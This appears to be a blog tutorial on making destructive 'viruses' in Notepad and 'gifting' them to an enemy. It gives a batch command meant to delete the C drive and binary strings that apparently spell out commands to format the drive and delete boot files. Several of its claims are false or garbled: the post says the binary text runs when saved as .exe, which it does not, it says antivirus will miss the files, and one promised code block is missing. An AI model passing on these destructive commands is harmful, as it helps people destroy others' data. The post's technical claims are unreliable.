Want to learn how to make deadly virus using notepad to format your enemy’s computer? Want to use a batch file trick (command prompt) to crash a computer? Well in this post you will learn how to make dangerous virus using text editor – Notepad.
Make a harmful virus that can delete the C drive in couple of seconds. By using the notepad, you can easily create a batch file to make dangerous computer virus.
Simply make dangerous virus using notepad and gift it to your enemy, as soon as he/she will click or run this harmful virus (batch file), the virus will delete the C drive in no time.
This cool windows trick to make dangerous virus does not need any software or application. It is pretty simple to make dangerous virus by just using the Notepad.
How Does a Notepad Virus Work?
When a programmer uses Windows coding on a text editor like notepad, the notepad with commands can be used for many purposes such a making a batch file to create a computer virus, create a document with alphanumeric words & special characters (notepad is best suits for DOS environments).
By using notepad, write the commands to force the Windows to perform the action, similarly this computer virus forces Windows to delete the C drive completely.
Make Dangerous Virus – Harmful & Deadly
1. Press Windows key + R (Run) and type notepad, then hit Enter to launch the notepad.
2. Copy the following batch command into the notepad.
@Echo off Del C: *.* |y
3. Save the notepad file as anyname.bat (.bat extension is important, name could be anything).
Now the deadly virus is ready to delete the C drive. Run this file on your enemy’s computer to crash the computer in a minute.
Luckily this computer virus made by notepad or batch file, does not detect by any security software or antivirus program.
Trick to Format a Computer Using Notepad
It seems Microsoft had put some prank coding of notepad to format any computer’s hard drive. There are so many tricks that can be used to make dangerous virus by just using a notepad and below is one of them.
1. Copy-paste below numeric code into a notepad file.
2. Now save that notepad file anywhere with .exe extension. Example – elkeesmedia.exe ( you can give it any name).
Now its done. As soon as you run this elkeesmedia.exe file, your computer will be formatted 🙂
If above code does not work to format a computer, you can try below one. Just follow the above instruction in the same manner.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
Trick to Corrupt Windows Booting Process
If you don’t want to loss the data and just willing to trouble your your friend, you can try following binary code. This code is extremely useful incase you just want to damage the Windows boot process. The data will remain saved in the hard drive, but only a professional computer technician can retrieve that back.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001
Note: Don’t try it on your own machine or make dangerous virus at your own risk. This tutorial is for learning purpose only, Elkees Media will not be responsible for any loss of data or damages.
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